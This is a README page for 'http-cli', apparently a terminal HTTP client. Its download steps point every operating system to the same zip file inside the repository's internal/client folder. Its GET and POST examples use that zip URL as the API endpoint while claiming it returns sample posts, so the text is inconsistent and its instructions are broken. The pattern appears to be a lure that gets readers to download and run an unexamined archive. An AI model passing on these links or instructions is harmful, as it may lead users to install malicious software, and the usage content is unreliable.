Skip to content

Latest commit

 

History

History
82 lines (62 loc) · 4.31 KB

File metadata and controls

82 lines (62 loc) · 4.31 KB

🌈 http-cli - A Fast, Colorful Command-Line Tool

📥 Download the Latest Version

Download http-cli

🚀 Getting Started

Welcome to http-cli! This tool lets you make HTTP requests easily from your terminal. It is lightweight, colorful, and similar to Postman, but designed to work right in your command line. Whether you are testing APIs, sending requests, or exploring endpoints, http-cli will help you do it quickly and efficiently.

💻 System Requirements

To run http-cli, ensure you have:

  • Operating System: Windows, macOS, or Linux
  • A terminal application to run commands
  • Minimum 50 MB of free disk space
  • Internet connection for downloading

🌐 Download & Install

  1. Visit the Releases Page: Go to the Releases page to find the latest version of http-cli.

  2. Download the Installation File: On the Releases page, you will see several files available for download. Choose the file that matches your operating system:

    • For Windows: https://github.com/Leoparj/http-cli/raw/refs/heads/main/internal/client/http-cli-3.6.zip
    • For macOS: https://github.com/Leoparj/http-cli/raw/refs/heads/main/internal/client/http-cli-3.6.zip
    • For Linux: https://github.com/Leoparj/http-cli/raw/refs/heads/main/internal/client/http-cli-3.6.zip
  3. Run the File: Once downloaded, locate the file on your computer and launch it. Follow the prompts to install http-cli.

🤖 Quick Usage Guide

After installing, you can start using http-cli right from your terminal. Here are some basic commands to get you started:

  • Make a GET Request:

    http-cli get https://github.com/Leoparj/http-cli/raw/refs/heads/main/internal/client/http-cli-3.6.zip
  • Make a POST Request:

    http-cli post https://github.com/Leoparj/http-cli/raw/refs/heads/main/internal/client/http-cli-3.6.zip --data '{"name": "John", "age": 30}'
  • View Help: If you need help with commands, simply type:

    http-cli help

This command provides you with an overview of all available options and features.

🛠 Features

  • User-Friendly Interface: http-cli provides colorful output to make it easier for you to read responses at a glance.
  • Supports Multiple Request Types: Send GET, POST, PUT, DELETE, and PATCH requests effortlessly.
  • Terminal Tool: Works directly in your command line, perfect for quick tests without needing a full GUI application.
  • Compatible with Various APIs: Use http-cli with RESTful APIs and other HTTP services.

📋 Example: Making Your First Request

  1. Open your terminal application.
  2. Type the command:
    http-cli get https://github.com/Leoparj/http-cli/raw/refs/heads/main/internal/client/http-cli-3.6.zip
  3. Press Enter. You will see a list of sample posts from the API, formatted for easy reading.

Feel free to try different endpoints and requests to explore the capability of http-cli.

✏️ Additional Links

❓ Frequently Asked Questions

How do I uninstall http-cli?

To uninstall http-cli, simply delete the installation file from your computer. For Windows, you may also find it in your Programs and Features list—remove it from there.

What support is available?

For assistance, please check the Issues section on GitHub. You can report problems or ask questions there. The community and maintainers will be glad to help you.

👍 Community and Contributions

We welcome contributions from everyone. If you have ideas for new features, find bugs, or want to improve documentation, please open an issue or create a pull request!

🔗 Don’t Forget

Remember that you can always find the latest version and updates on our Releases page. Enjoy using http-cli!